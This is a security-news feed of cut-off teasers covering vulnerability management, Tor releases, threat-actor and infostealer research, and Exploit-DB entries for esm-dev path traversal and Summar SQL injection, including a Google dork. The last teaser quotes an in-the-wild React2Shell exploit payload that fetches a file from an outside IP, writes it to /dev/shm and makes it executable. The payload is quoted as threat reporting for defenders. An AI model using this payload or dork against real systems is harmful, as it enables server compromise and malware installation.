ISC Stormcast For Wednesday, December 17th, 2025 https://isc.sans.edu/podcastdetail/9742
Key Takeaways: Cisco is ending support for its vuln management product (formerly Kenna Security) by June 2028. Risk-based vulnerability management (RBVM) used to be adequate, but is no longer sufficient. Exposure assessment platforms allow you to assess risks from all organizational risk surfaces. SOC centralizes post‑attack response, the ROC centralizes pre‑attack exposure management. Build your…
In our ongoing fight for internet freedom, it’s important to remember who we’re fighting for. That’s why in this blog post, we’re highlighting a story submitted by a Tor user and how Tor helps them circumvent government censorship. Ramon* is a Tor user living in Cuba who faces challenges accessing information from blocked websites, grapples…
Tor Browser 16.0a1 is now available from the Tor Browser download page and also from our distribution directory. This is the first Tor Browser Alpha release based on Firefox Rapid Release: read more about this important change in The Future of Tor Browser Alpha. This version includes important security updates to Firefox. Send us your…
Key Findings In recent months, Check Point Research has identified a new wave of attacks attributed to the Chinese threat actor Ink Dragon. Ink Dragon overlaps with threat clusters publicly reported as Earth Alux, Jewelbug, REF7707, CL-STA-0049, among others. Ink Dragon has expanded its operational focus to new regions – In the last few months, the threat actor’s activities show increased focus on…
# Exploit Title: esm-dev 136 – Path Traversal # Date: 2025-07-11 # Exploit Author: Byte Reaper # Vendor Homepage: https://github.com/esm-dev/esm.sh # Software Link: https://github.com/esm-dev/esm.sh # CVE-2025-59342 – File : exploit.c – Date : 09/17/2025 – Target : esm-dev – Version: 136 – Target Endpoint : /transform – Target Header : X-Zone-Id – Vuln : …
# Exploit Title: Summar Employee Portal 3.98.0 – Authenticated SQL Injection # Google Dork: inurl:"/MemberPages/quienesquien.aspx" # Date: 09/22/2025 # Exploit Author: Peter Gabaldon – https://pgj11.com/ # Vendor Homepage: https://www.summar.es/ # Software Link: https://www.summar.es/software-recursos-humanos/ # Version: < 3.98.0 # Tested on: Kali # CVE: CVE-2025-40677 # Description: SQL injection vulnerability in Summar Software's Portal del Empleado….
ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740 (Tue, Dec 16th)
Summary Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The…
Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{\”then\”:\”$B1337\”}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0″ ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To make…